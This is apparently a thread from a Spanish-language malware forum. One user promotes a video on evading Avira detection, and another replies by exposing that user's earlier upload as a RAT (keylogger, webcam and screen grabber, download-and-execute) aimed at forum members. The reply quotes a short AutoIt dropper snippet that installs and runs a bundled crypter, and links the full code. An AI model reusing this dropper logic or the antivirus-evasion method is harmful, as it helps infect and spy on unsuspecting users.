• Manuales y Tutoriales

  • Aquí puedes postear manuales referentes a malware y herramientas relativas a la tematica del foro.
Aquí puedes postear manuales referentes a malware y herramientas relativas a la tematica del foro.
 #495035  por die595tack068
 
Solo quiero compartir el link de mi canal que acabe de crear y que miren el metodo nuevo de indeteccion y runtime con avira, ya que es uno de los avs mas dificiles de evadir..
De paso soy el user die595tack067 fui baneado por algo que subi mientras hacia laboratorios, pido disculpas por eso, sin embargo tenia este otro usuario, no voy a subir mas herramientas pero pues voy a compartir el.metodo espero sea de su agrado, solo quiero tratar de revivir el foro, y no estar al pendiente de lo que suben los usuarios y estarlo escaneando en https://www.hybrid-analysis.com/?lang=es
Como la hace un user por ahi que no quiero decir quien es ;)

Link:   https://youtu.be/rXRLFxWbXWc
 #495058  por Scorpio
 
¡¿Mientras hacías laboratorios?! ¡¿SOBRE COMO INFECTAR A USUARIOS DEL FORO?! Lo que subiste fue un RAT que te hiciste, con todo... Keylogger, Screen Grabber, Webcam Grabber, Download & Execute, Delete Cookies... pensando que los usuarios del foro son tontos, pero somos mas listos que tu pichón.

La evidencia mas clara es ésta:
Código: Seleccionar todo
IF @SCRIPTNAME <> "LFQWMW.exe" AND @SCRIPTNAME <> "svwin2.exe" AND @SCRIPTNAME <> "svwin1.exe" THEN
    FILEINSTALL("C:\Users\toshiba\Desktop\vSupreme Crypter v0.2\vSupreme Crypter v0.2.exe", @TEMPDIR & "/RNOATS.exe")
    SHELLEXECUTE(@TEMPDIR & "/RNOATS.exe")
ENDIF
Aquí se ve claramente como uniste el Crypter puerco ese (Del cual también extraiste el Icono para usarlo al Compilar el RAT), para luego dropearlo, ejecutarlo y tratar de camuflar así el RAT.

Este es el Código Completo (El cual aún tiene 3 binarios más, uno de ellos al menos, es un Reverse Proxy en .DLL (¿Igual este era el verdadero aporte para el foro?):
https://pastebin.com/5Kkx2WEa

PD: Por lo que veo llevas al menos 9 meses usando el juguete y ya estás de sobra trackeado.

//Regards.